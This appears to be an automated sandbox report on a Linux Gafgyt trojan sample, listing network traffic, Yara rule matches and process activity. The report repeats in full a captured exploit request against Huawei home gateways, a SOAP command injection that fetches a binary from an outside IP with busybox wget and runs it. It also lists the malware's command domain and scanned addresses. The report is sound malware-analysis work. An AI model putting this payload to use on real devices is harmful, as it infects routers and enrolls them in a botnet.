            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
            Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
            Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
            Source: unknownTCP traffic detected without corresponding DNS query: 157.158.188.175
            Source: unknownTCP traffic detected without corresponding DNS query: 41.157.228.113
            Source: unknownTCP traffic detected without corresponding DNS query: 41.219.99.175
            Source: unknownTCP traffic detected without corresponding DNS query: 197.253.112.134
            Source: unknownTCP traffic detected without corresponding DNS query: 171.99.213.77
            Source: unknownTCP traffic detected without corresponding DNS query: 41.20.200.11
            Source: unknownTCP traffic detected without corresponding DNS query: 126.132.247.147
            Source: unknownTCP traffic detected without corresponding DNS query: 8.158.15.21
            Source: unknownTCP traffic detected without corresponding DNS query: 197.165.156.136
            Source: unknownTCP traffic detected without corresponding DNS query: 157.42.65.114
            Source: unknownTCP traffic detected without corresponding DNS query: 157.108.14.149
            Source: unknownTCP traffic detected without corresponding DNS query: 41.35.249.224
            Source: unknownTCP traffic detected without corresponding DNS query: 157.217.145.213
            Source: unknownTCP traffic detected without corresponding DNS query: 41.69.250.238
            Source: unknownTCP traffic detected without corresponding DNS query: 157.235.172.129
            Source: unknownTCP traffic detected without corresponding DNS query: 197.201.116.33
            Source: unknownTCP traffic detected without corresponding DNS query: 41.245.242.131
            Source: unknownTCP traffic detected without corresponding DNS query: 157.211.201.195
            Source: unknownTCP traffic detected without corresponding DNS query: 197.203.8.246
            Source: unknownTCP traffic detected without corresponding DNS query: 197.21.87.136
            Source: unknownTCP traffic detected without corresponding DNS query: 41.106.161.33
            Source: unknownTCP traffic detected without corresponding DNS query: 197.138.118.183
            Source: unknownTCP traffic detected without corresponding DNS query: 84.59.223.137
            Source: unknownTCP traffic detected without corresponding DNS query: 41.170.104.179
            Source: unknownTCP traffic detected without corresponding DNS query: 74.150.93.69
            Source: unknownTCP traffic detected without corresponding DNS query: 157.112.226.179
            Source: unknownTCP traffic detected without corresponding DNS query: 41.194.243.149
            Source: unknownTCP traffic detected without corresponding DNS query: 157.24.174.141
            Source: unknownTCP traffic detected without corresponding DNS query: 197.0.226.18
            Source: unknownTCP traffic detected without corresponding DNS query: 157.209.177.192
            Source: unknownTCP traffic detected without corresponding DNS query: 157.207.229.240
            Source: unknownTCP traffic detected without corresponding DNS query: 185.240.108.115
            Source: unknownTCP traffic detected without corresponding DNS query: 41.97.9.221
            Source: unknownTCP traffic detected without corresponding DNS query: 67.121.157.4
            Source: unknownTCP traffic detected without corresponding DNS query: 41.204.161.23
            Source: unknownTCP traffic detected without corresponding DNS query: 122.247.154.189
            Source: unknownTCP traffic detected without corresponding DNS query: 197.70.109.181
            Source: unknownTCP traffic detected without corresponding DNS query: 197.194.15.96
            Source: unknownTCP traffic detected without corresponding DNS query: 157.19.18.188
            Source: unknownTCP traffic detected without corresponding DNS query: 157.89.32.79
            Source: unknownTCP traffic detected without corresponding DNS query: 41.149.215.72
            Source: unknownTCP traffic detected without corresponding DNS query: 197.27.156.22
            Source: unknownTCP traffic detected without corresponding DNS query: 41.202.21.137
            Source: unknownTCP traffic detected without corresponding DNS query: 197.159.182.121
            Source: unknownTCP traffic detected without corresponding DNS query: 87.188.1.178
            Source: unknownTCP traffic detected without corresponding DNS query: 157.208.158.113
            Source: unknownTCP traffic detected without corresponding DNS query: 58.108.150.242
            Source: unknownTCP traffic detected without corresponding DNS query: 157.209.112.227
            Source: sduVQWDj8L.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: sduVQWDj8L.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 457Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 36 31 2e 31 38 31 2e 39 37 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: unknownDNS traffic detected: queries for: kamuiv3.hopto.org

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: sduVQWDj8L.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: Process Memory Space: sduVQWDj8L.elf PID: 6230, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
            Source: sduVQWDj8L.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: 6230.1.00007f5118001000.00007f5118013000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: Process Memory Space: sduVQWDj8L.elf PID: 6230, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: /bin/busybox
            Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.161.181.97 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
            Source: Initial sampleString containing 'busybox' found: Content-Length: h/bin/busybox/bin/watchdog/bin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
            Source: classification engineClassification label: mal92.troj.linELF@0/0@1/0

            Persistence and Installation Behavior

            barindex
            Sets full permissions to files and/or directories
            Source: /bin/sh (PID: 6237)Chmod executable with 777: /usr/bin/chmod -> chmod 777 \\xff\\xecHbin/busybox
            Source: /bin/sh (PID: 6235)Mkdir executable: /usr/bin/mkdir -> mkdir bin
            Source: /bin/sh (PID: 6237)Chmod executable: /usr/bin/chmod -> chmod 777 \\xff\\xecHbin/busybox
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1582/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/3088/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/230/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/110/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/231/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/111/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/232/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1579/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/112/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/233/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1699/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/113/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/234/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1335/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1698/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/114/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/235/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1334/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1576/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/2302/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/115/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/236/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/116/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/237/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/117/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/118/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/910/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/119/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/912/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/10/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/2307/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/11/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/918/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/6241/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/12/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/13/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/14/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/15/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/16/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/6244/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/17/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/18/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1594/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/120/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/121/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1349/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/122/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/243/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/123/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/2/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/124/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/3/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/4/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/125/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/126/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1344/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1465/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1586/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/127/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/6/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/248/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/128/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/249/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1463/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/800/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/9/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/801/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/20/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/21/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1900/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/22/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/23/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/24/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/25/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/26/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/27/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/28/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/29/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/491/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/250/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/130/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/251/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/252/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/132/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/253/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/254/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/255/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/256/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1599/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/257/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1477/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/379/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/258/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1476/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/259/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1475/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/4501/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/936/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/30/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/2208/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/35/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1809/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/1494/cmdline
            Source: /tmp/sduVQWDj8L.elf (PID: 6240)File opened: /proc/260/cmdline
